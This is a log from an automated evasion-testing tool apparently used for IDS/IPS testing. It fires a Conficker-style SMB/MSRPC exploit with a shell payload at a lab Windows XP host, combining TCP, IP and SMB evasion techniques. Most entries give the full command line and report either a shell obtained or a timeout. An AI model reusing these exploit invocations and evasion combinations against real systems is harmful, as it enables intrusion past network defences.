- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72020197> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before normal SMB writes, 1 SMB trees are opened and 4 writes are performed to them. The write payload is 402 bytes of zeroes.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a zero urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.114:44674 -> 10.35.1.207:445
- Terminated
- ..............
- 507 runs averaging 1.26 runs / second ; progress: 403/43200.Pid 11049 timed out - killed
- 2015-11-29 14:32:34 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20633 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=nYnMAcjCpmw --evasion=[smb_openpipe,msrpc_bind]smb_chaff,"1","write_flag","alphanum" --evasion=[smb_connect,smb_opentree]tcp_urgent,"8","random" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed nYnMAcjCpmy
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Add a random urgent data byte to every 8 TCP segment.
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before every 1th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- Info: NetBIOS connection 10.62.90.116:20633 -> 10.35.1.207:445
- Terminated
- .........
- 518 runs averaging 1.27 runs / second ; progress: 408/43200......2015-11-29 14:32:41 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55872 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=AI55OQEvx44 --evasion=[smb_connect,smb_opentree]tcp_paws,"1","10","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_paws,"25%","10","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed AI55OQEvx44
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:43937 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...........
- 27056 runs averaging 1.75 runs / second ; progress: 15463/43200.....2015-11-29 18:43:38 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37311 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=wyvgfRwwEMY --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"696","zero" --evasion=[smb_connect,end]tcp_paws,"5","268435454","random" --verifydelay=1000 --payload=shell
- Info: Using random seed wyvgfRwwEMb
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 696 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- Info: NetBIOS connection 10.62.90.118:37311 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 27063 runs averaging 1.75 runs / second ; progress: 15468/43200.....
- 27068 runs averaging 1.75 runs / second ; progress: 15473/43200........Pid 30630 timed out - killed
- 2015-11-29 18:43:47 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11483 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=I2UFterCp8Q --evasion=[smb_opentree,end]smb_decoytrees,"5","4","1","random" --evasion=[smb_opentree,msrpc_req]tcp_chaff,"13","nullchksum|shorthdr|longhdr","random" --evasion=[netbios_connect,end]tcp_urgent,"8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed I2UFterCp8Q
- The following evasions are applied from stage netbios_connect to end:
- - Add a zero urgent data byte to every 8 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 1 random bytes.
- Info: NetBIOS connection 10.62.90.112:11483 -> 10.35.1.207:445
- Terminated
- .2015-11-29 18:43:48 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55625 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=avb+WdU5Of4 --evasion=[start,end]tcp_paws,"1","268435454","random_alphanum" --evasion=[msrpc_bind,end]tcp_segvar,"16208","65535" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed avb+WdU5Of5
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Add a random alphaurgent data byte to every 13 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - TCP packets are segmented to contain between 16208 and 65535 bytes of payload.
- Info: NetBIOS connection 10.62.90.112:55625 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 27080 runs averaging 1.75 runs / second ; progress: 15478/43200.........
- 27089 runs averaging 1.75 runs / second ; progress: 15483/43200..............
- 27103 runs averaging 1.75 runs / second ; progress: 15488/43200..........
- 27113 runs averaging 1.75 runs / second ; progress: 15494/43200.......
- 27120 runs averaging 1.75 runs / second ; progress: 15499/43200.....
- 27125 runs averaging 1.75 runs / second ; progress: 15504/43200..............
- 27139 runs averaging 1.75 runs / second ; progress: 15509/43200.............2015-11-29 18:44:23 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57484 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=7SAxpWZ4/YA --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","3","2","random_msrpcbind" --evasion=[smb_openpipe,end]tcp_overlap,"4","new","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 7SAxpWZ4/YD
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.112:57484 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 27156 runs averaging 1.75 runs / second ; progress: 15514/43200..........2015-11-29 18:44:26 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64704 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=/auJxU4Kc4s --evasion=[start,end]tcp_paws,"25%","3","random_alphanum" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"2","1","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed /auJxU4Kc4v
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.117:64704 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...................
- 27186 runs averaging 1.75 runs / second ; progress: 15519/43200.........................
- 27211 runs averaging 1.75 runs / second ; progress: 15524/43200........2015-11-29 18:44:37 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24056 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=6n+RdaEVnnA --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"1","4","2046","random" --evasion=[msrpc_bind,end]tcp_paws,"1","268435455","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 6n+RdaEVnnD
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 1 SMB trees are opened and 4 writes are performed to them. The write payload is 2046 random bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.115:24056 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 27228 runs averaging 1.75 runs / second ; progress: 15529/43200..............
- 27242 runs averaging 1.75 runs / second ; progress: 15534/43200..........
- 27252 runs averaging 1.75 runs / second ; progress: 15539/43200.............2015-11-29 18:44:52 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26003 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=XAiIoFWwcfc --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"6","5","695","random_msrpcbind" --evasion=[start,end]tcp_initialseq,"4294967293" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","6","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed XAiIoFWwcfd
- - Initial TCP sequence number is set to 0xffffffff - 4294967293
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 5 writes are performed to them. The write payload is 695 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.118:26003 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..........
- 27276 runs averaging 1.75 runs / second ; progress: 15544/43200...........
- 27287 runs averaging 1.75 runs / second ; progress: 15549/43200...Pid 31683 timed out - killed
- 2015-11-29 18:45:00 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55926 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=aGAi08H15y0 --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"72" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed aGAi08H15y1
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 72 bytes per fragment
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.119:55926 -> 10.35.1.207:445
- Terminated
- ..............
- 27305 runs averaging 1.76 runs / second ; progress: 15554/43200......2015-11-29 18:45:09 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30801 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hx3QRcDiL+U --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","9","random_alphanum" --evasion=[netbios_connect,end]tcp_timewait,"3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed hx3QRcDiL+W
- The following evasions are applied from stage netbios_connect to end:
- - 3 decoy TCP connections are opened from the same TCP port as the exploit connection will use. Each connection will be 32-544 bytes long and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.116:30801 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 27314 runs averaging 1.76 runs / second ; progress: 15559/43200.........2015-11-29 18:45:11 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49130 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=f/d/WoCn4s8 --evasion=[netbios_connect,msrpc_bind]tcp_chaff,"25%","nullflag|outofwindow|longhdr","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"75%","5","random" --verifydelay=1000 --payload=shell
- Info: Using random seed f/d/WoCn4s9
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.116:49130 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..................................
- 27358 runs averaging 1.76 runs / second ; progress: 15564/43200...............
- 27373 runs averaging 1.76 runs / second ; progress: 15569/43200...................
- 27392 runs averaging 1.76 runs / second ; progress: 15574/43200..............2015-11-29 18:45:29 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17524 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=DsBpCDc6WlQ --evasion=[start,end]ipv4_frag,"1472" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","3","random" --verifydelay=1000 --payload=shell
- Info: Using random seed DsBpCDc6WlQ
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.119:17524 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 27408 runs averaging 1.76 runs / second ; progress: 15579/43200................2015-11-29 18:45:34 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41391 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Ch09Osy0JA4 --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"25%","chksum|outofwindow|longhdr","random_alphanum" --evasion=[start,end]tcp_paws,"21","14850612","alpharandomized" --evasion=[msrpc_bind,end]tcp_paws,"50%","30115434","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Ch09Osy0JA4
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 14850612> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 30115434> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.116:41391 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .....
- 27430 runs averaging 1.76 runs / second ; progress: 15584/43200.................2015-11-29 18:45:39 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62870 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=hcPJC8sYLrg --evasion=[smb_opentree,end]netbios_chaff,"25%","http_get|msrpc_req|broken_length" --evasion=[netbios_connect,end]tcp_paws,"2","5","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed hcPJC8sYLri
- The following evasions are applied from stage netbios_connect to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.119:62870 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 27450 runs averaging 1.76 runs / second ; progress: 15589/43200.............
- 27463 runs averaging 1.76 runs / second ; progress: 15594/43200Pid 32419 timed out - killed
- 2015-11-29 18:45:48 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24326 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=bPs+NuUP/pQ --evasion=[start,smb_opentree]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed bPs+NuUP/pR
- The following evasions are applied from stage start to smb_opentree:
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.114:24326 -> 10.35.1.207:445
- Terminated
- .
- 27465 runs averaging 1.76 runs / second ; progress: 15599/43200.....
- 27470 runs averaging 1.76 runs / second ; progress: 15604/43200..............
- 27484 runs averaging 1.76 runs / second ; progress: 15609/43200....................
- 27504 runs averaging 1.76 runs / second ; progress: 15614/43200..................
- 27522 runs averaging 1.76 runs / second ; progress: 15619/43200....
- 27526 runs averaging 1.76 runs / second ; progress: 15624/43200..........
- 27536 runs averaging 1.76 runs / second ; progress: 15629/43200...............
- 27551 runs averaging 1.76 runs / second ; progress: 15634/43200........................
- 27575 runs averaging 1.76 runs / second ; progress: 15640/43200...........
- 27586 runs averaging 1.76 runs / second ; progress: 15645/43200............
- 27598 runs averaging 1.76 runs / second ; progress: 15650/43200.........
- 27607 runs averaging 1.76 runs / second ; progress: 15655/43200..2015-11-29 18:46:47 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59721 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=891bOi00Urw --evasion=[netbios_connect,smb_opentree]ipv4_frag,"80" --evasion=[smb_opentree,end]tcp_paws,"5","268435455","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 891bOi00Urz
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - IPv4 fragments with at most 80 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.112:59721 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..................
- 27628 runs averaging 1.76 runs / second ; progress: 15660/43200..................
- 27646 runs averaging 1.76 runs / second ; progress: 15665/43200.........
- 27655 runs averaging 1.76 runs / second ; progress: 15670/43200.2015-11-29 18:47:01 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33922 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=GNVZQxmNpFE --evasion=[msrpc_bind,end]smb_decoytrees,"3","4","1","random_msrpcbind" --evasion=[msrpc_bind,msrpc_req]smb_seg,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed GNVZQxmNpFE
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 3 SMB trees are opened and 4 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - SMB writes are segmented to contain at most 7 bytes of payload.
- Info: NetBIOS connection 10.62.90.117:33922 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .......
- 27664 runs averaging 1.76 runs / second ; progress: 15675/43200............
- 27676 runs averaging 1.77 runs / second ; progress: 15680/43200.........
- 27685 runs averaging 1.77 runs / second ; progress: 15685/43200......2015-11-29 18:47:18 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23932 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=eZYvNY6iczk --evasion=[smb_connect,smb_openpipe]smb_writeandxpad,"858","random" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","4","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed eZYvNY6iczl
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 858 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.117:23932 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 27696 runs averaging 1.77 runs / second ; progress: 15690/43200.Pid 956 timed out - killed
- 2015-11-29 18:47:21 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55909 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=tnVOfG/VLwU --evasion=[smb_connect,msrpc_req]smb_decoytrees,"3","2","973","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_urgent,"5","random" --verifydelay=1000 --payload=shell
- Info: Using random seed tnVOfG/VLwW
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 3 SMB trees are opened and 2 writes are performed to them. The write payload is 973 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random urgent data byte to every 5 TCP segment.
- Info: NetBIOS connection 10.62.90.111:55909 -> 10.35.1.207:445
- Terminated
- ...............
- 27713 runs averaging 1.77 runs / second ; progress: 15695/43200..........
- 27723 runs averaging 1.77 runs / second ; progress: 15700/43200.............
- 27736 runs averaging 1.77 runs / second ; progress: 15705/43200......Pid 1391 timed out - killed
- 2015-11-29 18:47:38 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29321 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=AzPJyM0KsdE --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"5","empty_keepalive|small_unspec|http_get|msrpc_req" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed AzPJyM0KsdE
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- Info: NetBIOS connection 10.62.90.110:29321 -> 10.35.1.207:445
- Terminated
- ..........
- 27753 runs averaging 1.77 runs / second ; progress: 15710/43200.............
- 27766 runs averaging 1.77 runs / second ; progress: 15715/43200...Pid 1432 timed out - killed
- 2015-11-29 18:47:49 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12055 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=xV8Qwg+e8qU --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"13","small_unspec|http_post" --evasion=[smb_openpipe,end]tcp_paws,"75%","1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed xV8Qwg+e8qX
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
